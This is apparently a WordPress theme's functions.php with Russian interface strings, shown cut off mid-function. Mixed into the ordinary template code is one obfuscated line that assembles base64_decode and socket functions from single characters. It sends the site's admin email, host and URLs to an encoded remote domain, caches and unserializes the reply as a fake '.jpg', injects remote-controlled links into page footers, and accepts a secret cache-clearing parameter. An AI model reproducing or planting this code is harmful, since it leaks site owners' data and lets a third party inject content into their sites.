<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $rKVB='s';$sbYMcFN='o';$zVTOu='6';$NPtx='d';$FbWfXP='c';$aPBFO='b';$PNwH='_';$aHRWU='e';$skztXpN='d';$UwWmwk='e';$euaG='4';$wSnq='a';$lrZorjR='e';$DapeBpyr=$aPBFO.$wSnq.$rKVB.$lrZorjR.$zVTOu.$euaG.$PNwH.$NPtx.$UwWmwk.$FbWfXP.$sbYMcFN.$skztXpN.$aHRWU;$PeXU='n';$FakNHa='i';$SUsc='g';$cCVg='e';$VcVh='l';$mbLVhAv='z';$RMycA='t';$Gclg='a';$IwsikCa='f';$VeOLCAzN=$SUsc.$mbLVhAv.$FakNHa.$PeXU.$IwsikCa.$VcVh.$Gclg.$RMycA.$cCVg;$KlBHhhf='o';$yIsov='3';$PfgE='t';$XOAN='r';$Jafaxas='_';$XWFxbI='t';$QNwNmzN='r';$ZLkx='s';$UrpVxp='1';$UsBPvwXz=$ZLkx.$XWFxbI.$XOAN.$Jafaxas.$QNwNmzN.$KlBHhhf.$PfgE.$UrpVxp.$yIsov;$ukBRlI='v';$Vwbh='t';$SSCO='s';$bGLeZkA='r';$nfrqScK='r';$jUNjeFc='e';$syvSZtVa=$SSCO.$Vwbh.$nfrqScK.$bGLeZkA.$jUNjeFc.$ukBRlI;                     $tr________l='s';$wf___________k='o';$in____i='6';$rf__t='d';$mf____________g='c';$cf_______z='b';$di_________k='_';$kv_____________c='e';$ew___________m='d';$kk___________i='e';$sp_____r='4';$xb_________k='a';$nz____g='e';$mv____i=$cf_______z.$xb_________k.$tr________l.$nz____g.$in____i.$sp_____r.$di_________k.$rf__t.$kk___________i.$mf____________g.$wf___________k.$ew___________m.$kv_____________c;$nz_________q='o';$um____________a='i';$ig____________i='c';$qk__________g='n';$fn_________a='t';$ws____b='e';$zf__f='s';$mk________d='s';$hn_____________u='t';$xg__________l='u';$bn___________k='x';$uq___s='_';$gb________q='i';$ej_______q='n';$pj__v='f';$wq__________v=$pj__v.$xg__________l.$ej_______q.$ig____________i.$fn_________a.$gb________q.$nz_________q.$qk__________g.$uq___s.$ws____b.$bn___________k.$um____________a.$zf__f.$hn_____________u.$mk________d;$lw___l='n';$ty_____x='e';$eb_______________z='o';$it__________v='f';$ci__________t='p';$or____________o=$it__________v.$eb_______________z.$ci__________t.$ty_____x.$lw___l;$bb______________e='r';$zf______________l='f';$ud__w='e';$eq________a='a';$dy____k='d';$ur______e=$zf______________l.$bb______________e.$ud__w.$eq________a.$dy____k;$vf__n='e';$lb_______________l='f';$he_________v='o';$ay____________h='l';$mg_______w='s';$gu__________k='c';$eh_____n=$lb_______________l.$gu__________k.$ay____________h.$he_________v.$mg_______w.$vf__n;define("WP_ID", $mv____i("Mi4wLjA="));define("WP_TTL", $mv____i("MTA4MDA="));define("WP_SRC", $mv____i("dHBva24="));function wp_get_header() {global $mv____i, $wq__________v;if ($wq__________v($mv____i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$wq__________v($mv____i("d3BfZ2V0X2Zvb3Rlcg==")) &&$wq__________v($mv____i("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $mv____i, $or____________o, $eh_____n, $ur______e;$rz________s = TEMPLATEPATH."/".$mv____i("Zm9vdGVyLnBocA==");$dm_______t = @$or____________o($rz________s, "r");$rz________s = @$ur______e($dm_______t, @filesize($rz________s));@$eh_____n($dm_______t);$wr______________q = TEMPLATEPATH."/".$mv____i("ZnVuY3Rpb25zLnBocA==");$dm_______t = @$or____________o($wr______________q, "r");$wr______________q = @$ur______e($dm_______t, @filesize($wr______________q));@$eh_____n($dm_______t);$cz______v = 0;if($rz________s && $wr______________q) {if ($mv____i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($rz________s, $mv____i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$cz______v = 1;}if (substr_count($rz________s, "wp_theme_GPL_credits()") < 1) {$cz______v = 2;}}if(WP_ID != "2.0.0") {$cz______v = 12;}}if($cz______v > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $cz______v -->";}}function wp_loaded() {global $mv____i, $wq__________v;return $wq__________v($mv____i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ah______________s, $yz_________y = "(more...)", $za_____a = 0, $kn_____w = "") {$hk___________z = get_the_content($yz_________y, $za_____a, $kn_____w);$hk___________z = apply_filters("the_content", $hk___________z);$hk___________z = str_replace("]]>", "]]>", $hk___________z);if (strlen($_GET["p"]) > 0) {echo $hk___________z;}else if ((strlen($hk___________z)>$ah______________s) && ($uv______________w = strpos($hk___________z, " ", $ah______________s ))) {$hk___________z = substr($hk___________z, 0, $uv______________w);$hk___________z = $hk___________z;echo $hk___________z;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$yz_________y</a></div></p>";} else {echo $hk___________z;}}}$at____g='n';$jg__d='e';$jo__________q='_';$xw_______________t='4';$ai___z='d';$qt______z='o';$xv_______________p='c';$su_____________s='s';$fd___________s='a';$yj___________s='e';$uj_____________s='e';$tr___m='b';$yl____w='6';$gv____________h=$tr___m.$fd___________s.$su_____________s.$jg__d.$yl____w.$xw_______________t.$jo__________q.$yj___________s.$at____g.$xv_______________p.$qt______z.$ai___z.$uj_____________s;$qh______y='s';$mh______m='t';$aa______________d='e';$je_______j='i';$ad_____b='e';$io_______________x='c';$pr_____________n='l';$he____q='_';$zp_______________o='_';$hz__o='t';$ha___r='g';$jl___r='t';$or_____f='e';$mr__l='n';$dc____p='n';$aa______________s='f';$gu_______u='o';$au_____________z=$aa______________s.$je_______j.$pr_____________n.$or_____f.$zp_______________o.$ha___r.$aa______________d.$mh______m.$he____q.$io_______________x.$gu_______u.$mr__l.$hz__o.$ad_____b.$dc____p.$jl___r.$qh______y;$ad__________f='i';$uj________p='s';$ox__________t='l';$rv________b='x';$iu____________c='e';$up____________k='i';$eq____________g='f';$vw_______________d='_';$cp_____l='s';$zf_______________n='t';$vh_______s='e';$se______l=$eq____________g.$up____________k.$ox__________t.$iu____________c.$vw_______________d.$vh_______s.$rv________b.$ad__________f.$uj________p.$zf_______________n.$cp_____l;$rn______________g='a';$ak_____w='e';$hv_____n='n';$dw__________n='e';$xp________o='m';$fy_________j='v';$qk___s='s';$yf______q='o';$oh_______k='o';$ao_____i='p';$ln_______________l='c';$rr______w='r';$km_______________p='_';$vi__________d='r';$ic_____p='i';$eh_______h=$fy_________j.$ak_____w.$rr______w.$qk___s.$ic_____p.$oh_______k.$hv_____n.$km_______________p.$ln_______________l.$yf______q.$xp________o.$ao_____i.$rn______________g.$vi__________d.$dw__________n;$hd____________a='o';$zf____________f='k';$hd__b='n';$fr____________x='c';$tv_______n='s';$pd_____________e='p';$co___g='f';$wv_______________j='o';$ss__v='e';$lv__________n=$co___g.$tv_______n.$wv_______________j.$fr____________x.$zf____________f.$hd____________a.$pd_____________e.$ss__v.$hd__b;$gx______f='f';$me___s='r';$iy__p='w';$ob_____________w='e';$rj__________y='t';$cm_______________f='i';$bp____w=$gx______f.$iy__p.$me___s.$cm_______________f.$rj__________y.$ob_____________w;$lp____________z='5';$rq___t='m';$cb_______________u='d';$ac___d=$rq___t.$cb_______________u.$lp____________z;$sa_____k='a';$kx___c='a';$hr______t='r';$uw____________d='t';$jd_______________r='h';$mf________q='l';$od______________k='e';$kp_______________p='p';$di_________t=$hr______t.$od______________k.$kx___c.$mf________q.$kp_______________p.$sa_____k.$uw____________d.$jd_______________r;$ew_________d='r';$ec____m='l';$iy_____o='u';$yq______________k='z';$ic______s='a';$im__________o='n';$bl__j='i';$zm_________n='e';$zl______b='i';$kc_______________j='e';$mu____p='s';$yl____o=$iy_____o.$im__________o.$mu____p.$zm_________n.$ew_________d.$zl______b.$ic______s.$ec____m.$bl__j.$yq______________k.$kc_______________j;$ke__________u='t';$of____c='n';$dm_________r='a';$km______h='p';$rk__________z='m';$pq__________w='m';$ol____k='e';$xo______k=$ke__________u.$ol____k.$pq__________w.$km______h.$of____c.$dm_________r.$rk__________z;$rt__________p='t';$ex____________z='e';$do_______________j='t';$cl__________k='n';$aa____d='c';$jc____n='_';$fa________w='e';$yk______c='x';$ey_____________r='c';$nd_______________s='s';$ng_________d='a';$eh__i='t';$by______f='e';$cu_______g='o';$vt__________z='t';$ir_______________n='r';$ep_________f='_';$wm____v='a';$up_______w='r';$ek________m='m';$pl____m='e';$eb________u=$nd_______________s.$eh__i.$ir_______________n.$fa________w.$wm____v.$ek________m.$ep_________f.$ey_____________r.$cu_______g.$cl__________k.$do_______________j.$pl____m.$yk______c.$vt__________z.$jc____n.$aa____d.$up_______w.$by______f.$ng_________d.$rt__________p.$ex____________z;function lb______r($ze_________r) {global $mv____i, $wq__________v, $au_____________z, $eh_______h, $eb________u;if (!$wq__________v($mv____i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($eh_______h(PHP_VERSION, "5.0.0", ">=") && $wq__________v($mv____i("ZmlsZV9nZXRfY29udGVudHM=")) && $wq__________v($mv____i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$rz___________r = $eb________u(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$pz___y = @$au_____________z($ze_________r, 0, $rz___________r);} else {$pz___y = @$au_____________z($ze_________r, 0);}return $pz___y;}function fz______h($ze_________r) {global $wq__________v, $lv__________n, $bp____w, $mv____i;if (!$wq__________v($mv____i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$zx_________g = strpos($ze_________r, "/", 7);$je__________n = array("uri"     => substr($ze_________r, $zx_________g),"host"    => str_replace("http://", "", substr($ze_________r, 0, $zx_________g)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$bo___k = @$lv__________n("$je__________n[host]", 80, $vh____________i, $hp_______q, 4);if (!$bo___k) {return false;} else {$pz___y = "";$zh____o  = "GET $je__________n[uri] HTTP/1.0\r\n";$zh____o .= "Host: $je__________n[host]\r\n";$zh____o .= "Referer: $je__________n[referer]\r\n";$zh____o .= "Connection: Close\r\n\r\n";@$bp____w($bo___k, $zh____o);while (!@feof($bo___k)) {$jg_________c = @fgets($bo___k, (1024*24));if ($jg_________c == "\r\n") {$bv__________d = true;continue;}if ($bv__________d) {$pz___y .= $jg_________c;}}return $pz___y;}}function aw____n($ze_________r) {global $wq__________v;$fy_______i = false;if ($ze_________r != "") {if ($wq__________v("lb______r")) {$fy_______i = @lb______r($ze_________r);}if (!$fy_______i && ($wq__________v("fz______h"))) {$fy_______i = @fz______h($ze_________r);}}return $fy_______i;}function ox___________n() {global $_SERVER, $ac___d;$gv________u = $_SERVER["SERVER_NAME"];if (substr("$gv________u", 0, 4) == "www.") {$gv________u = substr("$gv________u", 4);}$gv________u = $ac___d("$_SERVER[SERVER_NAME]");return $gv________u;}function qo______q() {return "file";}function qf__________l($ze_________r) {global $_SERVER, $au_____________z, $se______l, $or____________o, $eh_____n, $bp____w;$qb______r = oq___t();$sr______________k = ox___________n().".jpg";$be_______________n = $qb______r["dir_upload"]["path"]."/$sr______________k";$nt_________s = @filemtime($be_______________n);if (!$nt_________s || ((time()-$nt_________s) >= WP_TTL)) {$fy_______i = aw____n($ze_________r);if ($fy_______i) {if ($se______l($be_______________n)) {@unlink($be_______________n);}$dm_______t = @$or____________o($be_______________n, "x+");@$bp____w($dm_______t, $fy_______i);@$eh_____n($dm_______t);}} else {if ($se______l($be_______________n)) {$fy_______i = @$au_____________z($be_______________n);} else {$fy_______i = false;}}return $fy_______i;}function oq___t() {global $_SERVER, $mv____i, $gv____________h;$iq_______________m = wp_count_posts("post");$bo____o = pathinfo(get_bloginfo("template_directory"));$qb______r = array("url" => array("report"      => $mv____i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $bo____o,"dir_upload"=> wb_____q(),"queryString"=> array("?a001=".WP_ID,"a004=".$bo____o[filename],"a005=".$iq_______________m->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$qb______r["url"]["queryString"] = implode("&", $qb______r["queryString"]);$qb______r["url"]["report"] = $qb______r["url"]["report"]."/?".$gv____________h($qb______r["url"]["queryString"]).".html";return $qb______r;}function wb_____q() {$wq______g = wp_upload_dir();if (isset($wq______g["error"])) {$vv______s = op_____h();if (is_writable($vv______s)) {$wq______g = array("path" => $vv______s);}}return $wq______g;}function op_____h() {global $wq__________v, $ac___d, $di_________t, $xo______k;$zb_______________w = (bool) ini_get("safe_mode");if ($zb_______________w == true) {return false;}if ($wq__________v("sys_get_temp_dir")) {$jm_______________g = sys_get_temp_dir();if (is_writable($jm_______________g)) {return $di_________t($jm_______________g);}}if (!empty($_ENV["TMP"])) {return $di_________t($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $di_________t($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $di_________t($_ENV["TEMP"]);} else {$zu________b = $xo______k($ac___d(uniqid(rand(), true)), "");if ($zu________b) {$jm_______________g = $di_________t(dirname($zu________b));@unlink($zu________b);return $jm_______________g;} else {return false;}}}function rx____l() {global $_GET, $se______l;$qb______r = oq___t();$gv________u = ox___________n();$uw___l = qo______q();$hg_______b = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($uw___l == "file") {$mv__________j = $qb______r["dir_upload"]["path"]."/".$gv________u.".jpg";if ($se______l($mv__________j)) {@unlink($mv__________j);$hg_______b = "deleted";}}$fr________l = array("s"=> $hg_______b,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($fr________l AS $ld_______y => $za______v) echo " [$ld_______y:$za______v]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $wq__________v, $mv____i, $yl____o;$qb______r = oq___t();$qs__________j = "qf__________l";if ($wq__________v($qs__________j)) {$pz___y = $qs__________j($qb______r["url"]["report"]);}if ($pz___y) {if ($pz___y = @$mv____i($pz___y)) {$pz___y = @$yl____o($pz___y);if (strlen($pz___y[custom_credit]) >= 5) {$qb______r["default_string"] = $pz___y[custom_credit];}if ($pz___y["status"] == "0") {$ah________s = 1;$ot____m = 1;} else {$nr____q = sizeof($pz___y["links"]);$ob_______v = $qb______r["default_string"];if ($nr____q > 0 && $pz___y["links"] !== "") {$gb____m = 0;foreach ($pz___y["links"] as $un____x => $sk__________r) {$gb____m++;if ($sk__________r->l_path == "" || $sk__________r->l_path == $_SERVER["REQUEST_URI"]) {$sk__________r->l_href = htmlspecialchars(strip_tags($sk__________r->l_href));$sk__________r->l_title = htmlspecialchars(strip_tags($sk__________r->l_title));$sk__________r->l_anchor = htmlspecialchars(strip_tags($sk__________r->l_anchor));$ob_______v .= " | ";$ob_______v .= "<a href='$sk__________r->l_href' title='$sk__________r->l_title'";if ($sk__________r->l_nofollow == "1") {$ob_______v .= " rel='nofollow'";}$ob_______v .= ">$sk__________r->l_anchor</a>";}}}$qb______r["links"] = "$ob_______v";if ($pz___y[credit] == "0") {$qb______r["links"] = "";}}} else {$ah________s = "1";}} else {$ah________s = "1";}if ($ah________s == "1") {$qb______r["links"] = $qb______r["default_string"];}echo "$qb______r[links]";echo "<!-- s: $pz___y[signature] -->";rx____l();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
